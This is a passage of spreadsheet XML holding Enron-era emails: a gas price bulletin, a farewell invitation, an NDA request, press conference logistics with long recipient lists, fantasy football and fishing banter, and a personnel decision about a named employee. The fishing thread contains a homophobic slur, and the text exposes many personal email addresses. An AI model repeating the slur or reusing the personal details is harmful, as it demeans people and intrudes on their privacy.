-    .0020=09         275,600=09Texas Eastern - M3 Zone =09_x000D_
    Transco Z-6 (NY)=09          $2.3600=09          $2.2800=09          $2=_x000D_
.3202=09+    .0043=09         204,800=09Transcontinental Gas Pipe Line Corp=_x000D_
. - Zone 6 (NY)=09_x000D_
 WEST =09=09=09=09=09=09=09_x000D_
    El Paso non-Bondad=09          $1.3000=09          $1.2400=09          =_x000D_
$1.2723=09+    .0024=09         130,000=09El Paso - San Juan Basin, Blanco =_x000D_
Pool=09_x000D_
    Huntingdon/Sumas=09          $1.3000=09          $1.2700=09          $1=_x000D_
.2872=09+    .0412=09         170,100=09Westcoast Energy &amp; Northwest Pipeli=_x000D_
ne Corp.=09_x000D_
    Opal=09          $1.3000=09          $1.1250=09          $1.1625=09-   =_x000D_
 .0084=09         171,000=09Opal=09_x000D_
    PG?Citygate=09          $1.9700=09          $1.8500=09          $1.9177=_x000D_
=09+    .0029=09         155,000=09PG?- Citygate =09_x000D_
    SoCal Border=09          $1.8500=09          $1.7700=09          $1.799=_x000D_
1=09-    .0609=09         192,500=09Southern California Border Points (Ehre=_x000D_
nberg,Topock,Needles)=09_x000D_
 WEST TEXAS =09=09=09=09=09=09=09_x000D_
    El Paso - Keystone=09          $1.7500=09          $1.6850=09          =_x000D_
$1.7130=09-    .0300=09         245,100=09El Paso - Keystone Pool=09_x000D_
    Waha=09          $1.8100=09          $1.7300=09          $1.7798=09-   =_x000D_
 .0465=09          67,6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20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20_x000D_
To become an Exchange Participant or inquire about the indices, please cont=_x000D_
act sales@intcx.com .                                                      =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                =20_x000D_
This information is sent to you free of charge and may be redistributed in =_x000D_
its entirety.  Republishing in any other form is prohibited.               =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                         =20_x000D_
If this was forwarded by a friend and you would like to receive your own da=_x000D_
ily bulletin, click here to subscribe .                                    =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                   =20_x000D_
To unsubscribe from this service, click here unsubscribe .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Copyright IntercontinentalExchange, Inc. 20=_x000D_
01, All Rights Reserved.                                                   =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                      </t>
  </si>
  <si>
    <t>Mon, 13 Nov 2000 08:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Dewey McLain</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kay Mann/Corp/Enron on 11/13/2000 04:27 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
dbennett@technip.com on 11/13/2000 04:00:33 PM_x000D_
To: kay.mann@enron.com, dowlena@camerondiv.com_x000D_
cc:  _x000D_
_x000D_
Subject: Dewey McLain_x000D_
_x000D_
Sorry you two, I almost forgot you..._x000D_
---------------------- Forwarded by Donna Bennett/TECHNIP-USA on 11/13/2000_x000D_
03:57 PM ---------------------------_x000D_
_x000D_
_x000D_
Donna Bennett_x000D_
11/13/2000 03:58 PM_x000D_
_x000D_
To:   Anil Akolkar/TECHNIP-USA@TECHNIP-USA, Jerry_x000D_
      Alves/TECHNIP-USA@TECHNIP-USA, Jim Anderson/TECHNIP-USA, Honey_x000D_
      Ashworth/TECHNIP-USA@TECHNIP-USA, Albert F._x000D_
      Astorga/TECHNIP-USA@TECHNIP-USA, Debbie_x000D_
      Bakemeier/TECHNIP-USA@TECHNIP-USA, Howard_x000D_
      Bass/TECHNIP-USA@TECHNIP-USA, Gary Bowles/TECHNIP-USA@TECHNIP-USA,_x000D_
      Ron Callaway/TECHNIP-USA@TECHNIP-USA, Carlos_x000D_
      Carvajal/TECHNIP-USA@TECHNIP-USA, Anthony_x000D_
      Castellese/TECHNIP-USA@TECHNIP-USA, Bobbi_x000D_
      Castellese/TECHNIP-USA@TECHNIP-USA, Kim_x000D_
      Castle/TECHNIP-USA@TECHNIP-USA, Lois_x000D_
      Christopher/TECHNIP-USA@TECHNIP-USA, Joan_x000D_
      Colquitt/TECHNIP-USA@TECHNIP-USA, Joe_x000D_
      Colquitt/TECHNIP-USA@TECHNIP-USA, John Crain/TECHNIP-USA@TECHNIP-USA,_x000D_
      Phillip Douglas/TECHNIP-USA@TECHNIP-USA, David_x000D_
      Edmondson/TECHNIP-USA@TECHNIP-USA, Tom_x000D_
      Gibson/TECHNIP-USA@TECHNIP-USA, Les Haas/TECHNIP-USA@TECHNIP-USA,_x000D_
      Chris Handwerk/TECHNIP-USA@TECHNIP-USA, Steve_x000D_
      Hansen/TECHNIP-USA@TECHNIP-USA, Les Harwell/TECHNIP-USA@TECHNIP-USA,_x000D_
      Lou Hawks/TECHNIP-USA@TECHNIP-USA, Paul_x000D_
      Heitfeld/TECHNIP-USA@TECHNIP-USA, Fred_x000D_
      Herrod/TECHNIP-USA@TECHNIP-USA, Sam Hext/TECHNIP-USA@TECHNIP-USA,_x000D_
      Tina Jones/TECHNIP-USA@TECHNIP-USA, Margie_x000D_
      Leggio/TECHNIP-USA@TECHNIP-USA, Efren_x000D_
      Manalansan/TECHNIP-USA@TECHNIP-USA, DMIELCAREK@TECHNIP@TECHNIP-USA,_x000D_
      Credia Moore/TECHNIP-USA@TECHNIP-USA, Nancy_x000D_
      Moran/TECHNIP-USA@TECHNIP-USA, Melissa Park/TECHNIP-USA@TECHNIP-USA,_x000D_
      Ed Peeler/TECHNIP-USA@TECHNIP-USA, Dean_x000D_
      Porter/TECHNIP-USA@TECHNIP-USA, Tom Randolph/TECHNIP-USA@TECHNIP-USA,_x000D_
      Larry Reans/TECHNIP-USA@TECHNIP-USA, Bobby_x000D_
      Rich/TECHNIP-USA@TECHNIP-USA, Earnie Samples/TECHNIP-USA@TECHNIP-USA,_x000D_
      Robert C. Sanders/TECHNIP-USA@TECHNIP-USA, Stuart_x000D_
      Scarborough/TECHNIP-USA@TECHNIP-USA, Zada_x000D_
      Shaefer/TECHNIP-USA@TECHNIP-USA, Cathy_x000D_
      Templeton/TECHNIP-USA@TECHNIP-USA, Reginald Van Den_x000D_
      Daelen/TECHNIP-USA@TECHNIP-USA, Mary VonArb/TECHNIP-USA@TECHNIP-USA,_x000D_
      Charlie White/TECHNIP-USA@TECHNIP-USA, Doug_x000D_
      White/TECHNIP-USA@TECHNIP-USA_x000D_
cc:_x000D_
Subject:  Dewey McLain_x000D_
_x000D_
We're having a small get together Wednesday, November 15 at Champs (located_x000D_
in the Uptown Park shopping center, near McCormick &amp; Schmick at the corner_x000D_
of 610 and Post Oak).  I'm sure there's a lot of us who didn't get to say_x000D_
good-bye so, stop by for a drink and wish Dewey good luck in his new_x000D_
adventure._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 24 Mar 2000 13:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'park.account@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'randy.young@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>project california</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Park Street Generic Account/LON/ECT on _x000D_
24/03/2000 21:08 ---------------------------_x000D_
_x000D_
_x000D_
Park Street Generic Account_x000D_
24/03/2000 20:56_x000D_
To: mmetts@enron.com, ryoumg4@enron.com, mitchell.taylor@enron.com, _x000D_
skean@enron.com, awalia@enron.com, Bruce _x000D_
Harris/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, rfaldyn@azurix.com, _x000D_
droak@velaw.com, jeffrey.holzschuh@msdw.com, james.mcginnis@msdw.com, _x000D_
hardip.rai@msdw.com, sandeep.talwani@msdw.com, martin.arias@msdw.com_x000D_
cc:  _x000D_
_x000D_
Subject: project california_x000D_
_x000D_
please find attached the latest draft of the IM for SoCal_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
regards_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 1 Mar 2001 07:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: NDA Request</t>
  </si>
  <si>
    <t xml:space="preserve">	Fred Philipson/ENRON@enronXgate_x000D_
	03/01/2001 01:31 PM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: NDA Request_x000D_
_x000D_
Tana:_x000D_
_x000D_
Can you please forward an NDA for Net Works and _x000D_
_x000D_
UnBound Technologies, Inc._x000D_
5295 Hollister Road_x000D_
Houston, Texas 77040_x000D_
_x000D_
Voice: 832.590.1000_x000D_
Fax: 832.590.1010_x000D_
Email: info@unboundtech.com &lt;mailto:info@unboundtech.com&gt;_x000D_
_x000D_
We are discussing applications and technology that we can develop and or _x000D_
license from / to each other._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Fred Philipson_x000D_
5-9323_x000D_
</t>
  </si>
  <si>
    <t>Thu, 5 Apr 2001 08:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Update on Governor's Press Conference</t>
  </si>
  <si>
    <t xml:space="preserve">I think you can also  listen in via the local public radio station via the=_x000D_
=20_x000D_
internet at:_x000D_
_x000D_
http://www.kqed.org/fm/whatson/live.html_x000D_
_x000D_
Alan=20_x000D_
_x000D_
_x000D_
_x000D_
From: Jeff Dasovich@ENRON on 04/05/2001 04:58 PM CDT_x000D_
Sent by: Jeff Dasovich@ENRON_x000D_
To: Alan Comnes/PDX/ECT@ECT, Angela Schwarz/HOU/EES@EES, Beverly=20_x000D_
Aden/HOU/EES@EES, Bill Votaw/HOU/EES@EES, Brenda Barreda/HOU/EES@EES, Carol=_x000D_
=20_x000D_
Moffett/HOU/EES@EES, Cathy Corbin/HOU/EES@EES, Chris H Foster/HOU/ECT@ECT,=_x000D_
=20_x000D_
Christina Liscano/HOU/EES@EES, Craig H Sutter/HOU/EES@EES, Dan=20_x000D_
Leff/HOU/EES@EES, Debora Whitehead/HOU/EES@EES, Dennis Benevides/HOU/EES@EE=_x000D_
S,=20_x000D_
Don Black/HOU/EES@EES, Dorothy Youngblood/HOU/ECT@ECT, Douglas=20_x000D_
Huth/HOU/EES@EES, Edward Sacks/Corp/Enron@ENRON, Eric Melvin/HOU/EES@EES,=_x000D_
=20_x000D_
Erika Dupre/HOU/EES@EES, Evan Hughes/HOU/EES@EES, Fran Deltoro/HOU/EES@EES,=_x000D_
=20_x000D_
Gayle W Muench/HOU/EES@EES, Ginger Dernehl/NA/Enron@ENRON, Gordon=20_x000D_
Savage/HOU/EES@EES, Harold G Buchanan/HOU/EES@EES, Harry=20_x000D_
Kingerski/NA/Enron@ENRON, Iris Waser/HOU/EES@EES, James D=20_x000D_
Steffes/NA/Enron@ENRON, James W Lewis/HOU/EES@EES, James Wright/Western=20_x000D_
Region/The Bentley Company@Exchange, Jeff Messina/HOU/EES@EES, Jeremy=20_x000D_
Blachman/HOU/EES@EES, Jess Hewitt/HOU/EES@EES, Joe Hartsoe/Corp/Enron@ENRON=_x000D_
,=20_x000D_
Karen Denne/Corp/Enron@ENRON, Kathy Bass/HOU/EES@EES, Kathy=20_x000D_
Dodgen/HOU/EES@EES, Ken Gustafson/HOU/EES@EES, Kevin Hughes/HOU/EES@EES,=20_x000D_
Leasa Lopez/HOU/EES@EES, Leticia Botello/HOU/EES@EES, Mark S=20_x000D_
Muller/HOU/EES@EES, Marsha Suggs/HOU/EES@EES, Marty Sunde/HOU/EES@EES,=20_x000D_
Meredith M Eggleston/HOU/EES@EES, Michael Etringer/HOU/ECT@ECT, Michael=20_x000D_
Mann/HOU/EES@EES, Michelle D Cisneros/HOU/ECT@ECT, mpalmer@enron.com, Neil=_x000D_
=20_x000D_
Bresnan/HOU/EES@EES, Neil Hong/HOU/EES@EES, Paul Kaufman/PDX/ECT@ECT, Paula=_x000D_
=20_x000D_
Warren/HOU/EES@EES, Richard L Zdunkewicz/HOU/EES@EES, Richard=20_x000D_
Leibert/HOU/EES@EES, Richard Shapiro/NA/Enron@ENRON, Rita=20_x000D_
Hennessy/NA/Enron@ENRON, Roger Yang/SFO/EES@EES, Rosalinda=20_x000D_
Tijerina/HOU/EES@EES, Sandra McCubbin/NA/Enron@ENRON, Sarah=20_x000D_
Novosel/Corp/Enron@ENRON, Scott Gahn/HOU/EES@EES, Scott Stoness/HOU/EES@EES=_x000D_
,=20_x000D_
Sharon Dick/HOU/EES@EES, skean@enron.com, Tanya Leslie/HOU/EES@EES, Tasha=_x000D_
=20_x000D_
Lair/HOU/EES@EES, Ted Murphy/HOU/ECT@ECT, Terri Greenlee/NA/Enron@ENRON, Ti=_x000D_
m=20_x000D_
Belden/HOU/ECT@ECT, Tony Spruiell/HOU/EES@EES, Vicki Sharp/HOU/EES@EES,=20_x000D_
Vladimir Gorny/HOU/ECT@ECT, Wanda Curry/HOU/EES@EES, William S=20_x000D_
Bradford/HOU/ECT@ECT, Kathryn Corbally/Corp/Enron@ENRON, Jubran=20_x000D_
Whalan/HOU/EES@EES, triley@enron.com, Richard B Sanders/HOU/ECT@ECT, Robert=_x000D_
 C=20_x000D_
Williams/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Greg Wolfe/HOU/ECT@ECT, James=_x000D_
=20_x000D_
Wright/Western Region/The Bentley Company@Exchange, Dirk vanUlden/Western=_x000D_
=20_x000D_
Region/The Bentley Company@Exchange, Steve Walker/SFO/EES@EES, Jennifer=20_x000D_
Rudolph/HOU/EES@EES, Martin Wenzel/SFO/HOU/EES@EES, Douglas=20_x000D_
Condon/SFO/EES@EES, wgang@enron.com, Scott Govenar &lt;sgovenar@govadv.com&gt;,=_x000D_
=20_x000D_
Hedy Govenar &lt;hgovenar@govadv.com&gt; @ ENRON, jklauber@llgm.com, Mike D=20_x000D_
Smith/HOU/EES@EES, John Neslage/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Janel=_x000D_
=20_x000D_
Guerrero/Corp/Enron@Enron, Eric Letke/DUB/EES@EES, Richard B=20_x000D_
Sanders/HOU/ECT@ECT, gfergus@brobeck.com, Michael Tribolet/ENRON@enronXgate=_x000D_
,=20_x000D_
Robert Frank/NA/Enron@Enron, Richard B Sanders/HOU/ECT@ECT,=20_x000D_
gfergus@brobeck.com_x000D_
cc: =20_x000D_
_x000D_
Subject: Update on Governor's Press Conference_x000D_
_x000D_
_x000D_
----- Forwarded by Jeff Dasovich/NA/Enron on 04/05/2001 04:57 PM -----_x000D_
_x000D_
=09Jean Munoz &lt;jmunoz@mcnallytemple.com&gt;_x000D_
=0904/05/2001 04:38 PM_x000D_
=09=09=20_x000D_
=09=09 To: "'Andy Brown (E-mail)'" &lt;ABB@eslawfirm.com&gt;, "'B Brown Andy (E-m=_x000D_
ail)'"=20_x000D_
&lt;andybrwn@earthlink.net&gt;, "'Baker Carolyn (E-mail)'"=20_x000D_
&lt;cabaker@duke-energy.com&gt;, "'Bob Escalante (E-mail)'"=20_x000D_
&lt;rescalante@riobravo-gm.com&gt;, "'Bob Weisenmiller (E-mail)'"=20_x000D_
&lt;rbw@mrwassoc.com&gt;, "'Curtis Kebler (E-mail)'"=20_x000D_
&lt;curtis_l_kebler@reliantenergy.com&gt;, "Dean. Nistetter (E-mail)"=20_x000D_
&lt;Dean.Nistetter@dynegy.com&gt;, "'Douglas Kerner (E-mail)'" &lt;DKK@eslawfirm.com=_x000D_
&gt;,=20_x000D_
"'Greg Blue (E-mail)'" &lt;gtbl@dynegy.com&gt;, "'Jan Smutny-Jones (E-mail)'"=20_x000D_
&lt;smutny@iepa.com&gt;, "'Jeff Dasovich (E-mail)'" &lt;Jeff.Dasovich@enron.com&gt;,=20_x000D_
"'Joe Ronan (E-mail)'" &lt;joer@calpine.com&gt;, "'John Larrea (E-mail)'"=20_x000D_
&lt;john.g.larrea@williams.com&gt;, "'John Stout (E-mail)'"=20_x000D_
&lt;John_H_Stout@reliantenergy.com&gt;, "'Julee Malinowski-Ball (E-mail)'"=20_x000D_
&lt;jmball@ns.net&gt;, "'Kassandra Gough (E-mail)'" &lt;kgough@calpine.com&gt;, "'kent=_x000D_
=20_x000D_
Palmerton (E-mail)'" &lt;kent.palmerton@williams.com&gt;, "'Lynn Lednicky=20_x000D_
(E-mail)'" &lt;lale@dynegy.com&gt;, "Marie Moretti (E-mail 2)"=20_x000D_
&lt;mmoretti@mccabeandcompany.net&gt;, "'Marty Wilson (E-mail)'"=20_x000D_
&lt;mwilson@pstrategies.com&gt;, "'McNally Ray (E-mail)'"=20_x000D_
&lt;rmcnally@mcnallytemple.com&gt;, "''Nam Nguyen' (E-mail)'"=20_x000D_
&lt;nam.nguyen@powersrc.com&gt;, "'Norton Kelli (E-mail)'"=20_x000D_
&lt;knorton@mcnallytemple.com&gt;, "'Paula Hall-Collins (E-mail)'"=20_x000D_
&lt;paula.hall-collins@williams.com&gt;, "'Pigott Jack (E-mail)'"=20_x000D_
&lt;jackp@calpine.com&gt;, "'Richard Hyde (E-mail)'" &lt;rwhyde@duke-energy.com&gt;,=20_x000D_
"'Roger Pelote (E-mail)'" &lt;roger.pelote@williams.com&gt;, "'Stephanie-Newell=_x000D_
=20_x000D_
(E-mail)'" &lt;stephanie-newell@reliantenergy.com&gt;, "'Sue Mara (E-mail)'"=20_x000D_
&lt;smara@enron.com&gt;, "'Tom Ross (E-mail)'" &lt;tross@mcnallytemple.com&gt;, "Tom=20_x000D_
Williams (E-mail)" &lt;tcwillia@duke-energy.com&gt;, "'Alex Sugaoka (E-mail)'"=20_x000D_
&lt;alex.sugaoka@uaecorp.com&gt;, "'Bill Carlson (E-mail)'"=20_x000D_
&lt;william_carlson@wastemanagement.com&gt;, "'Bill Woods (E-mail)'"=20_x000D_
&lt;billw@calpine.com&gt;, "'Bob Ellery (E-mail)'" &lt;bellery@spi-ind.com&gt;, "'Bob=_x000D_
=20_x000D_
Gates (E-mail)'" &lt;bob.gates@enron.com&gt;, "'Cody Carter (E-mail)'"=20_x000D_
&lt;cody.carter@williams.com&gt;, "'Curt Hatton (E-mail)'"=20_x000D_
&lt;Curt.Hatton@gen.pge.com&gt;, "'David Parquet'" &lt;david.parquet@enron.com&gt;,=20_x000D_
"'Dean Gosselin (E-mail)'" &lt;dean_gosselin@fpl.com&gt;, "'Doug Fernley (E-mail)=_x000D_
'"=20_x000D_
&lt;fernley.doug@epenergy.com&gt;, "'Duane Nelsen (E-mail)'"=20_x000D_
&lt;dnelsen@gwfpower.com&gt;, "'Ed Tomeo (E-mail)'" &lt;ed.tomeo@uaecorp.com&gt;,=20_x000D_
"'Eileen Koch (E-mail)'" &lt;eileenk@calpine.com&gt;, "'Eric Eisenman (E-mail)'"=_x000D_
=20_x000D_
&lt;eric.eisenman@gen.pge.com&gt;, "'Frank DeRosa (E-mail)'"=20_x000D_
&lt;frank.derosa@gen.pge.com&gt;, "Frazier Blaylock (E-mail)"=20_x000D_
&lt;frazier_blaylock@ogden-energy.com&gt;, "'Hap Boyd (E-mail)'"=20_x000D_
&lt;Hap_Boyd@enron.com&gt;, "'Hawks Jack (E-mail)'" &lt;jack.hawks@gen.pge.com&gt;, "'J=_x000D_
im=20_x000D_
Willey (E-mail)'" &lt;elliottsa@earthlink.net&gt;, "'Joe Greco (E-mail)'"=20_x000D_
&lt;jgreco@caithnessenergy.com&gt;, "'Jonathan Weisgall (E-mail)'"=20_x000D_
&lt;jweisgall@aol.com&gt;, "'Kate Castillo (E-mail)'" &lt;CCastillo@riobravo-gm.com&gt;=_x000D_
,=20_x000D_
"'Kelly Lloyd (E-mail)'" &lt;kellyl@enxco.com&gt;, "'Ken Hoffman (E-mail)'"=20_x000D_
&lt;khoffman@caithnessenergy.com&gt;, "'Kent Fickett (E-mail)'"=20_x000D_
&lt;kfickett@usgen.com&gt;, "'Lynn Lednicky (E-mail)'"=20_x000D_
&lt;lynn.a.lednicky@dynegy.com&gt;, "'Marty McFadden (E-mail)'"=20_x000D_
&lt;marty_mcfadden@ogden-energy.com&gt;, "'Paula Soos'"=20_x000D_
&lt;paula_soos@ogden-energy.com&gt;, "'Randy Hickok (E-mail)'"=20_x000D_
&lt;rjhickok@duke-energy.com&gt;, "Rick S. Koebbe (E-mail)"=20_x000D_
&lt;rskoebbe@powerworksinc.com&gt;, "'Rob Lamkin (E-mail)'"=20_x000D_
&lt;rllamkin@seiworldwide.com&gt;, "'Ross Ain (E-mail)'" &lt;ain@worldnet.att.net&gt;,=_x000D_
=20_x000D_
"'Steve Iliff'" &lt;siliff@riobravo-gm.com&gt;, "'Steve Ponder (E-mail)'"=20_x000D_
&lt;steve_ponder@fpl.com&gt;, "'Tony Wetzel (E-mail)'" &lt;twetzel@thermoecotek.com&gt;=_x000D_
,=20_x000D_
"'William Hall (E-mail)'" &lt;wfhall2@duke-energy.com&gt;,=20_x000D_
&lt;trusso@mcnallytemple.com&gt;, &lt;sadlersa@earthlink.net&gt;, &lt;mstultz@epsa.org&gt;,=_x000D_
=20_x000D_
&lt;rtemple@mcnallytemple.com&gt;, &lt;tracy.fairchild@edelman.com&gt;,=20_x000D_
&lt;megan.beiser@edelman.com&gt;, &lt;deborah.fiorito@dynegy.com&gt;, &lt;lchurch@epsa.org=_x000D_
&gt;,=20_x000D_
Katie Kaplan &lt;kaplan@iepa.com&gt;, &lt;tcwillia@duke-energy.com&gt;,=20_x000D_
&lt;rwhyde@duke-energy.com&gt;_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: Update on Governor's Press Conference_x000D_
_x000D_
The Governor's Press Conference will air at 6:05 pm PST throughout Californ=_x000D_
ia=20_x000D_
-- and IEP will be responding. =20_x000D_
_x000D_
If you are not in California, and would like to listen in, you can do so if=_x000D_
=20_x000D_
you have satellite access. Satellite feed information: Telstar 5; transpond=_x000D_
er=20_x000D_
19. =20_x000D_
If you do not have access to satellite, IEP will be forwarding a "recap" as=_x000D_
=20_x000D_
soon as possible following the press conference._x000D_
_x000D_
_x000D_
If you would like to listen to the IEP response, the specifics are outlined=_x000D_
=20_x000D_
below. Thanks!  Jean_x000D_
_______________________________________________x000D_
_x000D_
_x000D_
ENERGY PRODUCERS REACT TO GOVERNORS? ADDRESS_x000D_
_x000D_
SACRAMENTO =01. Jan Smutny-Jones, Executive Director of the Independent Ene=_x000D_
rgy=20_x000D_
Producers, will react to Governor Davis? energy address immediately followi=_x000D_
ng=20_x000D_
his remarks today at 6:05 pm.=20_x000D_
_x000D_
What:    Reaction to Governor?s Energy Address=20_x000D_
  =20_x000D_
When:        Immediately following Governor?s remarks_x000D_
_x000D_
[Satellite Feed: 6:30pm PST d 7:00pm PST]_x000D_
_x000D_
Where:        State Capitol outside room 1190, or by_x000D_
      =20_x000D_
Satellite Feed:_x000D_
KU BAND GE 3 Transponder 17 Full_x000D_
Downlink Frequency: 12040 Horizontal &gt; Audio: 6.2 &amp; 6.8_x000D_
For technical information contact: 916-446-7890_x000D_
_x000D_
Who:    Jan Smutny-Jones_x000D_
Executive Director=20_x000D_
Independent Energy Producers Association_x000D_
_x000D_
_x000D_
#         #         #_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 11 Jul 2000 08:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lenine.jeganathan@enron.com', 'brian.hoskins@enron.com'})</t>
  </si>
  <si>
    <t>Draft</t>
  </si>
  <si>
    <t xml:space="preserve">Just in case you were interested.  Here is some of the correspondence that is _x000D_
going on._x000D_
---------------------- Forwarded by Eric Bass/HOU/ECT on 07/11/2000 03:35 PM _x000D_
---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Eric Bass                           07/11/2000 11:32 AM_x000D_
	_x000D_
_x000D_
To: Jason.Bass2@COMPAQ.com, Phillip M Love/HOU/ECT@ECT, Bryan _x000D_
Hull/HOU/ECT@ECT, David Baumbach/HOU/ECT@ECT, lqcolombo@aol.com, Michael _x000D_
Walters/HOU/ECT@ECT, Matthew Lenhart/HOU/ECT@ECT, Harry Bucalo/HOU/ECT@ECT, _x000D_
Gary W Lamphier/HOU/ECT@ECT, O'Neal D Winfree/HOU/ECT@ECT, Hector _x000D_
Campos/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Draft_x000D_
_x000D_
Last year we played with a mandatory Tight End.  Do you want to continue this _x000D_
and thus start 1 QB, 2 RBs, 3WRs, 1 TE, 1 K, 1 Def?_x000D_
_x000D_
Also,  I need to know if you would prefer to determine the draft order prior _x000D_
to the draft.  I would prefer to do this b/c it gives the opportunity to plan _x000D_
and trade your picks._x000D_
_x000D_
Let me know._x000D_
_x000D_
Eric_x000D_
</t>
  </si>
  <si>
    <t>Thu, 30 May 2002 14:55:47 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'wollam.erik@enron.com'})</t>
  </si>
  <si>
    <t>RE: surf looking realy good</t>
  </si>
  <si>
    <t xml:space="preserve">#1- Was supposed to be a "meat haul"...not a trophy hunt._x000D_
#2- Landing nets are for boats._x000D_
#3- The thrill of avoiding a "barbing" by one of the many treble hooks connected to typical plugs intensifies the experience. See Zander experience in the surf._x000D_
#4- CCA gets plenty of my money already...see Chad and I at Crawfish Boil._x000D_
#5- Addendum to item #2: Landing nets are for old people. Or fags._x000D_
_x000D_
	-----Original Message----- _x000D_
	From: Erik Wollam [mailto:erwollam@hotmail.com] _x000D_
	Sent: Thu 5/30/2002 2:27 PM _x000D_
	To: Brian Constantine; akoenig@hhw-law.com; knipe3@msn.com; chet_fenner@bmc.com; Joe.Parks@bridgeline.net; john.chambers@bisys.com _x000D_
	Cc: _x000D_
	Subject: RE: surf looking realy good_x000D_
	_x000D_
	_x000D_
_x000D_
	Join tournament and keep a landing net with you on your trophy hunts._x000D_
	_x000D_
	_x000D_
	&gt;From: "Brian Constantine" &lt;brianc@saltgrass.com&gt;_x000D_
	&gt;To: "Erik Wollam" &lt;erwollam@hotmail.com&gt;, &lt;akoenig@hhw-law.com&gt;,_x000D_
	&gt;&lt;knipe3@msn.com&gt;, &lt;chet_fenner@bmc.com&gt;, &lt;Joe.Parks@bridgeline.net&gt;,_x000D_
	&gt;&lt;john.chambers@bisys.com&gt;_x000D_
	&gt;Subject: RE: surf looking realy good_x000D_
	&gt;Date: Thu, 30 May 2002 12:25:10 -0500_x000D_
	&gt;_x000D_
	&gt;OOooohhhhh...just looked at the Surfside cam and its...well, damn. Its ON_x000D_
	&gt;boys. Go...go now...do not wait. Cancel all evening appointments and go._x000D_
	&gt;Wind is 6 mph out of the Northwest...that wont last long._x000D_
	&gt;_x000D_
	&gt;Report from yesterday...Fished West side of Pelican Island shoreline on_x000D_
	&gt;point closest to Sand Island  waist deep over shell. Caught 6 on_x000D_
	&gt;Chart/Orange/blue Top Dog and blue/chart/silver mirrolure._x000D_
	&gt;LOST THE STAR TOURNEY LEADER TROUT!!!! Blew up on TopDog, got her to_x000D_
	&gt;hand...I was shaking like a freaking leaf. Made "the grab" she exploded out_x000D_
	&gt;of my hand, threw the hook, and Top Dog lodged in my shirt!!! 2nd 28?plus_x000D_
	&gt;trout I've lost on that shoreline in 2 years!!! Then, after I quit shaking_x000D_
	&gt;and what not, I realized I wasn't even ENTERED in the damn tourney, so I am_x000D_
	&gt;glad I didn't catch her!!! She was every inch of 28 and fat with hardly any_x000D_
	&gt;spots. Big, old female. Damn I love fishing._x000D_
	&gt;_x000D_
	&gt;                                                                               OINK_x000D_
	&gt;_x000D_
	&gt;-----Original Message-----_x000D_
	&gt;From: Erik Wollam [mailto:erwollam@hotmail.com]_x000D_
	&gt;Sent: Thursday, May 30, 2002 9:30 AM_x000D_
	&gt;To: akoenig@hhw-law.com; knipe3@msn.com; chet_fenner@bmc.com;_x000D_
	&gt;Joe.Parks@bridgeline.net; john.chambers@bisys.com; Brian Constantine_x000D_
	&gt;Subject: surf looking realy good_x000D_
	&gt;_x000D_
	&gt;surf cams show flat and green. fishing reports positive. forcast unkown._x000D_
	&gt;Zander says he will fish surf tomorrow am if looks good. Alfred, you still_x000D_
	&gt;planning on going down tonight for your galveston hearing?_x000D_
	&gt;_x000D_
	&gt;_x000D_
	&gt;_x000D_
	&gt;_x000D_
	&gt;__________________________________________________________________x000D_
	&gt;Chat with friends online, try MSN Messenger: http://messenger.msn.com_x000D_
	&gt;_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	__________________________________________________________________x000D_
	MSN Photos is the easiest way to share and print your photos:_x000D_
	http://photos.msn.com/support/worldwide.aspx_x000D_
	_x000D_
	</t>
  </si>
  <si>
    <t>Tue, 23 Jan 2001 07:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'orlando.gonzalez@enron.com'})</t>
  </si>
  <si>
    <t>Orlando_x000D_
_x000D_
On Ed Graham._x000D_
_x000D_
I pushed the issue with Cliff and Kevin Hannon._x000D_
_x000D_
Kevin, Cliff and Jeff Donanue (current head of M&amp;A for Broadband) met on the _x000D_
issue after I talked to them.  They have decided to give him 6 months to _x000D_
perform or he will be let go.  His bonus for 2000 will be 0. _x000D_
_x000D_
I know you wanted a different outcome but this is the best I could do._x000D_
_x000D_
John</t>
  </si>
  <si>
    <t>Tue, 16 Oct 2001 05:13:27 -0700 (PDT)</t>
  </si>
  <si>
